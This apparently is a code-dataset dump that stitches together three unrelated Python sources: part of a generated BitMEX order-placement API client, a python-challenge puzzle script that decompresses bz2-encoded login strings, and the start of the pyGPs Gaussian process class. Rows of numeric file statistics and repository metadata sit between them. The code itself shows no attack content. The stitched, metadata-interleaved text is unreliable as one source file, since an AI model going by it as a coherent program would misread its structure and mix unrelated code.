:param float simple_order_qty: Order quantity in units of the underlying instrument (i.e. Bitcoin).
:param float order_qty: Order quantity in units of the instrument (i.e. contracts).
:param float price: Optional limit price for 'Limit', 'StopLimit', and 'LimitIfTouched' orders.
:param float display_qty: Optional quantity to display in the book. Use 0 for a fully hidden order.
:param float stop_px: Optional trigger price for 'Stop', 'StopLimit', 'MarketIfTouched', and 'LimitIfTouched' orders. Use a price below the current price for stop-sell orders and buy-if-touched orders. Use `execInst` of 'MarkPrice' or 'LastPrice' to define the current price used for triggering.
:param str cl_ord_id: Optional Client Order ID. This clOrdID will come back on the order and any related executions.
:param str cl_ord_link_id: Optional Client Order Link ID for contingent orders.
:param float peg_offset_value: Optional trailing offset from the current price for 'Stop', 'StopLimit', 'MarketIfTouched', and 'LimitIfTouched' orders; use a negative offset for stop-sell orders and buy-if-touched orders. Optional offset from the peg price for 'Pegged' orders.
:param str peg_price_type: Optional peg price type. Valid options: LastPeg, MidPricePeg, MarketPeg, PrimaryPeg, TrailingStopPeg.
:param str ord_type: Order type. Valid options: Market, Limit, Stop, StopLimit, MarketIfTouched, LimitIfTouched, MarketWithLeftOverAsLimit, Pegged. Defaults to 'Limit' when `price` is specified. Defaults to 'Stop' when `stopPx` is specified. Defaults to 'StopLimit' when `price` and `stopPx` are specified.
:param str time_in_force: Time in force. Valid options: Day, GoodTillCancel, ImmediateOrCancel, FillOrKill. Defaults to 'GoodTillCancel' for 'Limit', 'StopLimit', 'LimitIfTouched', and 'MarketWithLeftOverAsLimit' orders.
:param str exec_inst: Optional execution instructions. Valid options: ParticipateDoNotInitiate, AllOrNone, MarkPrice, IndexPrice, LastPrice, Close, ReduceOnly, Fixed. 'AllOrNone' instruction requires `displayQty` to be 0. 'MarkPrice', 'IndexPrice' or 'LastPrice' instruction valid for 'Stop', 'StopLimit', 'MarketIfTouched', and 'LimitIfTouched' orders.
:param str contingency_type: Optional contingency type for use with `clOrdLinkID`. Valid options: OneCancelsTheOther, OneTriggersTheOther, OneUpdatesTheOtherAbsolute, OneUpdatesTheOtherProportional.
:param str text: Optional order annotation. e.g. 'Take profit'.
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.order_new_with_http_info(symbol, **kwargs) # noqa: E501
else:
(data) = self.order_new_with_http_info(symbol, **kwargs) # noqa: E501
return data
def order_new_with_http_info(self, symbol, **kwargs): # noqa: E501
"""Create a new order. # noqa: E501
## Placing Orders This endpoint is used for placing orders. See individual fields below for more details on their use. #### Order Types All orders require a `symbol`. All other fields are optional except when otherwise specified. These are the valid `ordType`s: * **Limit**: The default order type. Specify an `orderQty` and `price`. * **Market**: A traditional Market order. A Market order will execute until filled or your bankruptcy price is reached, at which point it will cancel. * **MarketWithLeftOverAsLimit**: A market order that, after eating through the order book as far as permitted by available margin, will become a limit order. The difference between this type and `Market` only affects the behavior in thin books. Upon reaching the deepest possible price, if there is quantity left over, a `Market` order will cancel the remaining quantity. `MarketWithLeftOverAsLimit` will keep the remaining quantity in the books as a `Limit`. * **Stop**: A Stop Market order. Specify an `orderQty` and `stopPx`. When the `stopPx` is reached, the order will be entered into the book. * On sell orders, the order will trigger if the triggering price is lower than the `stopPx`. On buys, higher. * Note: Stop orders do not consume margin until triggered. Be sure that the required margin is available in your account so that it may trigger fully. * `Close` Stops don't require an `orderQty`. See Execution Instructions below. * **StopLimit**: Like a Stop Market, but enters a Limit order instead of a Market order. Specify an `orderQty`, `stopPx`, and `price`. * **MarketIfTouched**: Similar to a Stop, but triggers are done in the opposite direction. Useful for Take Profit orders. * **LimitIfTouched**: As above; use for Take Profit Limit orders. #### Execution Instructions The following `execInst`s are supported. If using multiple, separate with a comma (e.g. `LastPrice,Close`). * **ParticipateDoNotInitiate**: Also known as a Post-Only order. If this order would have executed on placement, it will cancel instead. * **MarkPrice, LastPrice, IndexPrice**: Used by stop and if-touched orders to determine the triggering price. Use only one. By default, `'MarkPrice'` is used. Also used for Pegged orders to define the value of `'LastPeg'`. * **ReduceOnly**: A `'ReduceOnly'` order can only reduce your position, not increase it. If you have a `'ReduceOnly'` limit order that rests in the order book while the position is reduced by other orders, then its order quantity will be amended down or canceled. If there are multiple `'ReduceOnly'` orders the least aggressive will be amended first. * **Close**: `'Close'` implies `'ReduceOnly'`. A `'Close'` order will cancel other active limit orders with the same side and symbol if the open quantity exceeds the current position. This is useful for stops: by canceling these orders, a `'Close'` Stop is ensured to have the margin required to execute, and can only execute up to the full size of your position. If `orderQty` is not specified, a `'Close'` order has an `orderQty` equal to your current position's size. * Note that a `Close` order without an `orderQty` requires a `side`, so that BitMEX knows if it should trigger above or below the `stopPx`. #### Linked Orders Linked Orders are an advanced capability. It is very powerful, but its use requires careful coding and testing. Please follow this document carefully and use the [Testnet Exchange](https://testnet.bitmex.com) while developing. BitMEX offers four advanced Linked Order types: * **OCO**: *One Cancels the Other*. A very flexible version of the standard Stop / Take Profit technique. Multiple orders may be linked together using a single `clOrdLinkID`. Send a `contingencyType` of `OneCancelsTheOther` on the orders. The first order that fully or partially executes (or activates for `Stop` orders) will cancel all other orders with the same `clOrdLinkID`. * **OTO**: *One Triggers the Other*. Send a `contingencyType` of `'OneTriggersTheOther'` on the primary order and then subsequent orders with the same `clOrdLinkID` will be not be triggered until the primary order fully executes. * **OUOA**: *One Updates the Other Absolute*. Send a `contingencyType` of `'OneUpdatesTheOtherAbsolute'` on the orders. Then as one order has a execution, other orders with the same `clOrdLinkID` will have their order quantity amended down by the execution quantity. * **OUOP**: *One Updates the Other Proportional*. Send a `contingencyType` of `'OneUpdatesTheOtherProportional'` on the orders. Then as one order has a execution, other orders with the same `clOrdLinkID` will have their order quantity reduced proportionally by the fill percentage. #### Trailing Stops You may use `pegPriceType` of `'TrailingStopPeg'` to create Trailing Stops. The pegged `stopPx` will move as the market moves away from the peg, and freeze as the market moves toward it. To use, combine with `pegOffsetValue` to set the `stopPx` of your order. The peg is set to the triggering price specified in the `execInst` (default `'MarkPrice'`). Use a negative offset for stop-sell and buy-if-touched orders. Requires `ordType`: `'Stop', 'StopLimit', 'MarketIfTouched', 'LimitIfTouched'`. #### Simple Quantities Send a `simpleOrderQty` instead of an `orderQty` to create an order denominated in the underlying currency. This is useful for opening up a position with 1 XBT of exposure without having to calculate how many contracts it is. #### Rate Limits See the [Bulk Order Documentation](#!/Order/Order_newBulk) if you need to place multiple orders at the same time. Bulk orders require fewer risk checks in the trading engine and thus are ratelimited at **1/10** the normal rate. You can also improve your reactivity to market movements while staying under your ratelimit by using the [Amend](#!/Order/Order_amend) and [Amend Bulk](#!/Order/Order_amendBulk) endpoints. This allows you to stay in the market and avoids the cancel/replace cycle. #### Tracking Your Orders If you want to keep track of order IDs yourself, set a unique `clOrdID` per order. This `clOrdID` will come back as a property on the order and any related executions (including on the WebSocket), and can be used to get or cancel the order. Max length is 36 characters. You can also change the `clOrdID` by amending an order, supplying an `origClOrdID`, and your desired new ID as the `clOrdID` param, like so: ``` # Amends an order's leavesQty, and updates its clOrdID to \"def-456\" PUT /api/v1/order {\"origClOrdID\": \"abc-123\", \"clOrdID\": \"def-456\", \"leavesQty\": 1000} ``` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.order_new_with_http_info(symbol, async=True)
>>> result = thread.get()
:param async bool
:param str symbol: Instrument symbol. e.g. 'XBTUSD'. (required)
:param str side: Order side. Valid options: Buy, Sell. Defaults to 'Buy' unless `orderQty` or `simpleOrderQty` is negative.
:param float simple_order_qty: Order quantity in units of the underlying instrument (i.e. Bitcoin).
:param float order_qty: Order quantity in units of the instrument (i.e. contracts).
:param float price: Optional limit price for 'Limit', 'StopLimit', and 'LimitIfTouched' orders.
:param float display_qty: Optional quantity to display in the book. Use 0 for a fully hidden order.
:param float stop_px: Optional trigger price for 'Stop', 'StopLimit', 'MarketIfTouched', and 'LimitIfTouched' orders. Use a price below the current price for stop-sell orders and buy-if-touched orders. Use `execInst` of 'MarkPrice' or 'LastPrice' to define the current price used for triggering.
:param str cl_ord_id: Optional Client Order ID. This clOrdID will come back on the order and any related executions.
:param str cl_ord_link_id: Optional Client Order Link ID for contingent orders.
:param float peg_offset_value: Optional trailing offset from the current price for 'Stop', 'StopLimit', 'MarketIfTouched', and 'LimitIfTouched' orders; use a negative offset for stop-sell orders and buy-if-touched orders. Optional offset from the peg price for 'Pegged' orders.
:param str peg_price_type: Optional peg price type. Valid options: LastPeg, MidPricePeg, MarketPeg, PrimaryPeg, TrailingStopPeg.
:param str ord_type: Order type. Valid options: Market, Limit, Stop, StopLimit, MarketIfTouched, LimitIfTouched, MarketWithLeftOverAsLimit, Pegged. Defaults to 'Limit' when `price` is specified. Defaults to 'Stop' when `stopPx` is specified. Defaults to 'StopLimit' when `price` and `stopPx` are specified.
:param str time_in_force: Time in force. Valid options: Day, GoodTillCancel, ImmediateOrCancel, FillOrKill. Defaults to 'GoodTillCancel' for 'Limit', 'StopLimit', 'LimitIfTouched', and 'MarketWithLeftOverAsLimit' orders.
:param str exec_inst: Optional execution instructions. Valid options: ParticipateDoNotInitiate, AllOrNone, MarkPrice, IndexPrice, LastPrice, Close, ReduceOnly, Fixed. 'AllOrNone' instruction requires `displayQty` to be 0. 'MarkPrice', 'IndexPrice' or 'LastPrice' instruction valid for 'Stop', 'StopLimit', 'MarketIfTouched', and 'LimitIfTouched' orders.
:param str contingency_type: Optional contingency type for use with `clOrdLinkID`. Valid options: OneCancelsTheOther, OneTriggersTheOther, OneUpdatesTheOtherAbsolute, OneUpdatesTheOtherProportional.
:param str text: Optional order annotation. e.g. 'Take profit'.
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['symbol', 'side', 'simple_order_qty', 'order_qty', 'price', 'display_qty', 'stop_px', 'cl_ord_id', 'cl_ord_link_id', 'peg_offset_value', 'peg_price_type', 'ord_type', 'time_in_force', 'exec_inst', 'contingency_type', 'text'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method order_new" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'symbol' is set
if ('symbol' not in params or
params['symbol'] is None):
raise ValueError("Missing the required parameter `symbol` when calling `order_new`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'symbol' in params:
form_params.append(('symbol', params['symbol'])) # noqa: E501
if 'side' in params:
form_params.append(('side', params['side'])) # noqa: E501
if 'simple_order_qty' in params:
form_params.append(('simpleOrderQty', params['simple_order_qty'])) # noqa: E501
if 'order_qty' in params:
form_params.append(('orderQty', params['order_qty'])) # noqa: E501
if 'price' in params:
form_params.append(('price', params['price'])) # noqa: E501
if 'display_qty' in params:
form_params.append(('displayQty', params['display_qty'])) # noqa: E501
if 'stop_px' in params:
form_params.append(('stopPx', params['stop_px'])) # noqa: E501
if 'cl_ord_id' in params:
form_params.append(('clOrdID', params['cl_ord_id'])) # noqa: E501
if 'cl_ord_link_id' in params:
form_params.append(('clOrdLinkID', params['cl_ord_link_id'])) # noqa: E501
if 'peg_offset_value' in params:
form_params.append(('pegOffsetValue', params['peg_offset_value'])) # noqa: E501
if 'peg_price_type' in params:
form_params.append(('pegPriceType', params['peg_price_type'])) # noqa: E501
if 'ord_type' in params:
form_params.append(('ordType', params['ord_type'])) # noqa: E501
if 'time_in_force' in params:
form_params.append(('timeInForce', params['time_in_force'])) # noqa: E501
if 'exec_inst' in params:
form_params.append(('execInst', params['exec_inst'])) # noqa: E501
if 'contingency_type' in params:
form_params.append(('contingencyType', params['contingency_type'])) # noqa: E501
if 'text' in params:
form_params.append(('text', params['text'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['apiKey', 'apiNonce', 'apiSignature'] # noqa: E501
return self.api_client.call_api(
'/order', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Order', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def order_new_bulk(self, **kwargs): # noqa: E501
"""Create multiple new orders for the same symbol. # noqa: E501
This endpoint is used for placing bulk orders. Valid order types are Market, Limit, Stop, StopLimit, MarketIfTouched, LimitIfTouched, MarketWithLeftOverAsLimit, and Pegged. Each individual order object in the array should have the same properties as an individual POST /order call. This endpoint is much faster for getting many orders into the book at once. Because it reduces load on BitMEX systems, this endpoint is ratelimited at `ceil(0.1 * orders)`. Submitting 10 orders via a bulk order call will only count as 1 request, 15 as 2, 32 as 4, and so on. For now, only `application/json` is supported on this endpoint. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.order_new_bulk(async=True)
>>> result = thread.get()
:param async bool
:param str orders: An array of orders.
:return: list[Order]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.order_new_bulk_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.order_new_bulk_with_http_info(**kwargs) # noqa: E501
return data
def order_new_bulk_with_http_info(self, **kwargs): # noqa: E501
"""Create multiple new orders for the same symbol. # noqa: E501
This endpoint is used for placing bulk orders. Valid order types are Market, Limit, Stop, StopLimit, MarketIfTouched, LimitIfTouched, MarketWithLeftOverAsLimit, and Pegged. Each individual order object in the array should have the same properties as an individual POST /order call. This endpoint is much faster for getting many orders into the book at once. Because it reduces load on BitMEX systems, this endpoint is ratelimited at `ceil(0.1 * orders)`. Submitting 10 orders via a bulk order call will only count as 1 request, 15 as 2, 32 as 4, and so on. For now, only `application/json` is supported on this endpoint. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.order_new_bulk_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str orders: An array of orders.
:return: list[Order]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orders'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method order_new_bulk" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'orders' in params:
form_params.append(('orders', params['orders'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['apiKey', 'apiNonce', 'apiSignature'] # noqa: E501
return self.api_client.call_api(
'/order/bulk', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Order]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 66.087786
| 6,648
| 0.665232
| 9,002
| 69,260
| 4.995779
| 0.077205
| 0.030953
| 0.019924
| 0.015209
| 0.944076
| 0.936449
| 0.931624
| 0.92651
| 0.921062
| 0.920217
| 0
| 0.012393
| 0.240399
| 69,260
| 1,047
| 6,649
| 66.150907
| 0.842406
| 0.034291
| 0
| 0.774955
| 0
| 0
| 0.213215
| 0.045386
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.00726
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
f70fe9c7b4c2d2219e6b95fb49dd28ca0b904f97
| 339
|
py
|
Python
|
Python/python-tutorials/python-challenge/integrity.py
|
zhongyangynag/code-study
|
5410929554107a384a09d899c6fa3d16ed383d2b
|
[
"MIT"
] | null | null | null |
Python/python-tutorials/python-challenge/integrity.py
|
zhongyangynag/code-study
|
5410929554107a384a09d899c6fa3d16ed383d2b
|
[
"MIT"
] | null | null | null |
Python/python-tutorials/python-challenge/integrity.py
|
zhongyangynag/code-study
|
5410929554107a384a09d899c6fa3d16ed383d2b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
un='BZh91AY&SYA\xaf\x82\r\x00\x00\x01\x01\x80\x02\xc0\x02\x00 \x00!\x9ah3M\x07<]\xc9\x14\xe1BA\x06\xbe\x084'
pw='BZh91AY&SY\x94$|\x0e\x00\x00\x00\x81\x00\x03$ \x00!\x9ah3M\x13<]\xc9\x14\xe1BBP\x91\xf08'
import bz2
print bz2.BZ2Decompressor().decompress(un)
# huge
print bz2.BZ2Decompressor().decompress(pw)
# file
| 28.25
| 108
| 0.728614
| 61
| 339
| 4.04918
| 0.655738
| 0.097166
| 0.186235
| 0.267206
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.225
| 0.056047
| 339
| 11
| 109
| 30.818182
| 0.546875
| 0.088496
| 0
| 0
| 0
| 0.4
| 0.628289
| 0.621711
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.2
| null | null | 0.4
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f719d938c36fb80ad1c9ea86ac17254b9fc23390
| 50,482
|
py
|
Python
|
pyGPs/Core/gp.py
|
Corentin-LF/pyGPs
|
b9d36777584cd53756bd4311c3c20ea52e945451
|
[
"BSD-2-Clause"
] | null | null | null |
pyGPs/Core/gp.py
|
Corentin-LF/pyGPs
|
b9d36777584cd53756bd4311c3c20ea52e945451
|
[
"BSD-2-Clause"
] | null | null | null |
pyGPs/Core/gp.py
|
Corentin-LF/pyGPs
|
b9d36777584cd53756bd4311c3c20ea52e945451
|
[
"BSD-2-Clause"
] | null | null | null |
from __future__ import division
from __future__ import absolute_import
from builtins import str
from builtins import range
from builtins import object
from past.utils import old_div
#================================================================================
# Marion Neumann [marion dot neumann at uni-bonn dot de]
# Daniel Marthaler [dan dot marthaler at gmail dot com]
# Shan Huang [shan dot huang at iais dot fraunhofer dot de]
# Kristian Kersting [kristian dot kersting at cs dot tu-dortmund dot de]
#
# This file is part of pyGPs.
# The software package is released under the BSD 2-Clause (FreeBSD) License.
#
# Copyright (c) by
# Marion Neumann, Daniel Marthaler, Shan Huang & Kristian Kersting, 18/02/2014
#================================================================================
# MEANING OF NOTATION:
#
# inffunc function specifying the inference method
# covfunc prior covariance function (see below)
# meanfunc prior mean function
# likfunc likelihood function
# x n by D matrix of training inputs
# y column vector of length n of training targets
# xs n by D matrix of test inputs
# ys column vector of length nn of true test targets (optional)
# nlZ returned value of the negative log marginal likelihood
# dnlZ column vector of partial derivatives of the negative
# log marginal likelihood w.r.t. each hyperparameter
# ym column vector (of length ns) of predictive output means
# ys2 column vector (of length ns) of predictive output variances
# fm column vector (of length ns) of predictive latent means
# fs2 column vector (of length ns) of predictive latent variances
# lp column vector (of length ns) of log predictive probabilities
# post struct representation of the (approximate) posterior
# post consists of post.alpha, post.L, post.sW
#
# This is a object-oriented python implementation of gpml functionality
# (Copyright (c) by Carl Edward Rasmussen and Hannes Nickisch, 2011-02-18).
# based on the functional-version of python implementation
# (Copyright (c) by Marion Neumann and Daniel Marthaler, 20/05/2013)
#
# Copyright (c) by Marion Neumann and Shan Huang, 30/09/2013
import itertools
import numpy as np
import matplotlib.pyplot as plt
from . import inf, mean, lik, cov, opt
from .tools import unique, jitchol, solve_chol
from copy import deepcopy
import pyGPs
from pyGPs.Core.cov import FITCOfKernel
import logging
SHADEDCOLOR = [0.7539, 0.89453125, 0.62890625, 1.0]
MEANCOLOR = [ 0.2109375, 0.63385, 0.1796875, 1.0]
DATACOLOR = [0.12109375, 0.46875, 1., 1.0]
class GP(object):
'''
Base class for GP model.
'''
def __init__(self):
super(GP, self).__init__()
self.usingDefaultMean = True # was using default mean function now?
self.meanfunc = None # mean function
self.covfunc = None # covariance function
self.likfunc = None # likelihood function
self.inffunc = None # inference function
self.optimizer = None # optimizer object
self.nlZ = None # negative log marginal likelihood
self.dnlZ = None # column vector of partial derivatives of the negative
# log marginal likelihood w.r.t. each hyperparameter
self.posterior = None # struct representation of the (approximate) posterior
self.x = None # n by D matrix of training inputs
self.y = None # column vector of length n of training targets
self.xs = None # n by D matrix of test inputs
self.ys = None # column vector of length nn of true test targets (optional)
self.ym = None # column vector (of length ns) of predictive output means
self.ys2 = None # column vector (of length ns) of predictive output variances
self.fm = None # column vector (of length ns) of predictive latent means
self.fs2 = None # column vector (of length ns) of predictive latent variances
self.lp = None # column vector (of length ns) of log predictive probabilities
self.logger = logging.getLogger(__name__)
def __str__(self):
strvalue = 'To get the properties of the model use:\n'+\
'model.nlZ # negative log marginal likelihood\n'+\
'model.dnlZ.cov # derivatives of cov func of negative log marginal likelihood\n'+\
'model.dnlZ.lik # derivatives of lik func of negative log marginal likelihood\n'+\
'model.dnlZ.mean # derivatives of mean func of negative log marginal likelihood\n'+\
'model.posterior # posterior structure\n'+\
'model.covfunc.hyp # hyperparameters of cov func\n'+\
'model.meanfunc.hyp # hyperparameters of mean func\n'+\
'model.likfunc.hyp # hyperparameters of lik func\n'+\
'model.fm # latent mean\n'+\
'model.fs2 # latent variance\n'+\
'model.ym # predictive mean\n'+\
'model.ys2 # predictive variance\n'+\
'model.lp # log predictive probability'
return strvalue
def __repr__(self):
strvalue = str(type(self))+': '+\
'to get the properties of the model use:\n'+\
'model.nlZ # negative log marginal likelihood\n'+\
'model.dnlZ.cov # derivatives of cov func of negative log marginal likelihood\n'+\
'model.dnlZ.lik # derivatives of lik func of negative log marginal likelihood\n'+\
'model.dnlZ.mean # derivatives of mean func of negative log marginal likelihood\n'+\
'model.posterior # posterior structure\n'+\
'model.covfunc.hyp # hyperparameters of cov func\n'+\
'model.meanfunc.hyp # hyperparameters of mean func\n'+\
'model.likfunc.hyp # hyperparameters of lik func\n'+\
'model.fm # latent mean\n'+\
'model.fs2 # latent variance\n'+\
'model.ym # predictive mean\n'+\
'model.ys2 # predictive variance\n'+\
'model.lp # log predictive probability'
return strvalue
def setData(self, x, y):
'''
Set training inputs and traning labels to model.
:param x: training inputs in shape (n,D)
:param y: training labels in shape (n,1)
Note this method will transform x, y to correct shape
if x, y is given in 1d array.
'''
# check wether the number of inputs and labels match
assert x.shape[0] == y.shape[0], "number of inputs and labels does not match"
# check the shape of inputs
# transform to the correct shape
if x.ndim == 1:
x = np.reshape(x, (x.shape[0],1))
if y.ndim == 1:
y = np.reshape(y, (y.shape[0],1))
self.x = x
self.y = y
if self.usingDefaultMean:
c = np.mean(y)
self.meanfunc = mean.Const(c) # adapt default prior mean wrt. training labels
def plotData_1d(self, axisvals=None):
'''
Toy Method for ploting 1d data of the model.
:param list axisvals: [min_x, max_x, min_y, max_y] setting the plot range
'''
plt.figure()
plt.plot(self.x, self.y, ls='None', marker='+', color=DATACOLOR, ms=12, mew=2)
if axisvals:
plt.axis(axisvals)
plt.grid()
plt.xlabel('input x')
plt.ylabel('target y')
plt.show()
def plotData_2d(self,x1,x2,t1,t2,p1,p2,axisvals=None):
'''
Toy Method for ploting 2d data of the model. \n
For plotting, we superimpose the data points with the posterior equi-probability contour
lines for the probability of class two given complete information about the generating mechanism.
:param x1: inputs for class +1
:param x2: inputs for class -1
:param t1: meshgrid array for the first axis
:param t2: meshgrid array for the second axis
:param p1,p2: contour lines contains p2/(p1+p2)
:param list axisvals: [min_x, max_x, min_y, max_y] setting the plot range
That is to say, the contour is ploted by plt.contour(t1, t2, p2/(p1+p2) )
Note these parameters are (only) used for our hard-coded data for classification demo.
'''
fig = plt.figure()
plt.plot(x1[:,0], x1[:,1], 'b+', markersize = 12)
plt.plot(x2[:,0], x2[:,1], 'r+', markersize = 12)
pc = plt.contour(t1, t2, np.reshape(old_div(p2,(p1+p2)), (t1.shape[0],t1.shape[1]) ))
fig.colorbar(pc)
plt.grid()
if axisvals:
plt.axis(axisvals)
plt.show()
def setPrior(self, mean=None, kernel=None):
'''
Set prior mean and covariance other than the default setting of current model.
:param mean: instance of mean class. (e.g. mean.Linear())
:param kernel: instance of covariance class. (e.g. cov.RBF())
'''
# check the type of inputs
# ensure they are the right class before setting prior
if not mean is None:
assert isinstance(mean, pyGPs.mean.Mean), "mean function is not an instance of pyGPs.mean.Mean"
self.meanfunc = mean
self.usingDefaultMean = False
if not kernel is None:
assert isinstance(kernel, pyGPs.cov.Kernel), "cov function is not an instance of pyGPs.cov.Kernel"
self.covfunc = kernel
if type(kernel) is cov.Pre:
self.usingDefaultMean = False
def setOptimizer(self, method, num_restarts=None, min_threshold=None, meanRange=None, covRange=None, likRange=None):
'''
This method is used to sepecify optimization configuration. By default, gp uses a single run "minimize".
:param method: Optimization methods. Possible values are:\n
"Minimize" -> minimize by Carl Rasmussen (python implementation of "minimize" in GPML)\n
"CG" -> conjugent gradient\n
"BFGS" -> quasi-Newton method of Broyden, Fletcher, Goldfarb, and Shanno (BFGS)\n
"SCG" -> scaled conjugent gradient (faster than CG)\n
:param num_restarts: Set if you want to run mulitiple times of optimization with different initial guess.
It specifys the maximum number of runs/restarts/trials.
:param min_threshold: Set if you want to run mulitiple times of optimization with different initial guess.
It specifys the threshold of objective function value. Stop optimization when this value is reached.
:param meanRange: The range of initial guess for mean hyperparameters.
e.g. meanRange = [(-2,2), (-5,5), (0,1)].
Each tuple specifys the range (low, high) of this hyperparameter,
This is only the range of initial guess, during optimization process, optimal hyperparameters may go out of this range.
(-5,5) for each hyperparameter by default.
:param covRange: The range of initial guess for kernel hyperparameters. Usage see meanRange
:param likRange: The range of initial guess for likelihood hyperparameters. Usage see meanRange
'''
pass
def optimize40(self, x=None, y=None, numIterations=40):
'''
Train optimal hyperparameters based on training data,
adjust new hyperparameters to all mean/cov/lik functions.
:param x: training inputs in shape (n,D)
:param y: training labels in shape (n,1)
'''
# check wether the number of inputs and labels match
if x is not None and y is not None:
assert x.shape[0] == y.shape[0], "number of inputs and labels does not match"
# check the shape of inputs
# transform to the correct shape
if not x is None:
if x.ndim == 1:
x = np.reshape(x, (x.shape[0],1))
self.x = x
if not y is None:
if y.ndim == 1:
y = np.reshape(y, (y.shape[0],1))
self.y = y
if self.usingDefaultMean and self.meanfunc is None:
c = np.mean(y)
self.meanfunc = mean.Const(c) # adapt default prior mean wrt. training labels
# optimize
optimalHyp, optimalNlZ = self.optimizer.findMin(self.x, self.y, numIters = numIterations)
self.nlZ = optimalNlZ
# apply optimal hyp to all mean/cov/lik functions here
self.optimizer._apply_in_objects(optimalHyp)
self.getPosterior()
def optimize(self, x=None, y=None, numIterations=1000):
'''
Train optimal hyperparameters based on training data,
adjust new hyperparameters to all mean/cov/lik functions.
:param x: training inputs in shape (n,D)
:param y: training labels in shape (n,1)
'''
# check wether the number of inputs and labels match
if x is not None and y is not None:
assert x.shape[0] == y.shape[0], "number of inputs and labels does not match"
# check the shape of inputs
# transform to the correct shape
if not x is None:
if x.ndim == 1:
x = np.reshape(x, (x.shape[0],1))
self.x = x
if not y is None:
if y.ndim == 1:
y = np.reshape(y, (y.shape[0],1))
self.y = y
if self.usingDefaultMean and self.meanfunc is None:
c = np.mean(y)
self.meanfunc = mean.Const(c) # adapt default prior mean wrt. training labels
# optimize
optimalHyp, optimalNlZ = self.optimizer.findMin(self.x, self.y, numIters = numIterations)
self.nlZ = optimalNlZ
# apply optimal hyp to all mean/cov/lik functions here
self.optimizer._apply_in_objects(optimalHyp)
self.getPosterior()
def getPosterior(self, x=None, y=None, der=True):
'''
Fit the training data. Update negative log marginal likelihood(nlZ),
partial derivatives of nlZ w.r.t. each hyperparameter(dnlZ),
and struct representation of the (approximate) posterior(post),
which consists of post.alpha, post.L, post.sW.
nlZ, dnlZ, post = getPosterior(x, y, der=True)\n
nlZ, post = getPosterior(x, y, der=False )
:param x: training inputs in shape (n,D)
:param y: training labels in shape (n,1)
:param boolean der: flag for whether to compute derivatives
:return: negative log marginal likelihood (nlZ), derivatives of nlZ (dnlZ), posterior structure(post)
You can print post to see descriptions of posterior.
or see pyGPs.Core.inf for details.
'''
# check wether the number of inputs and labels match
if x is not None and y is not None:
assert x.shape[0] == y.shape[0], "number of inputs and labels does not match"
# check the shape of inputs
# transform to the correct shape
if not x is None:
if x.ndim == 1:
x = np.reshape(x, (x.shape[0],1))
self.x = x
if not y is None:
if y.ndim == 1:
y = np.reshape(y, (y.shape[0],1))
self.y = y
if self.usingDefaultMean and self.meanfunc is None:
c = np.mean(y)
self.meanfunc = mean.Const(c) # adapt default prior mean wrt. training labels
# call inference method
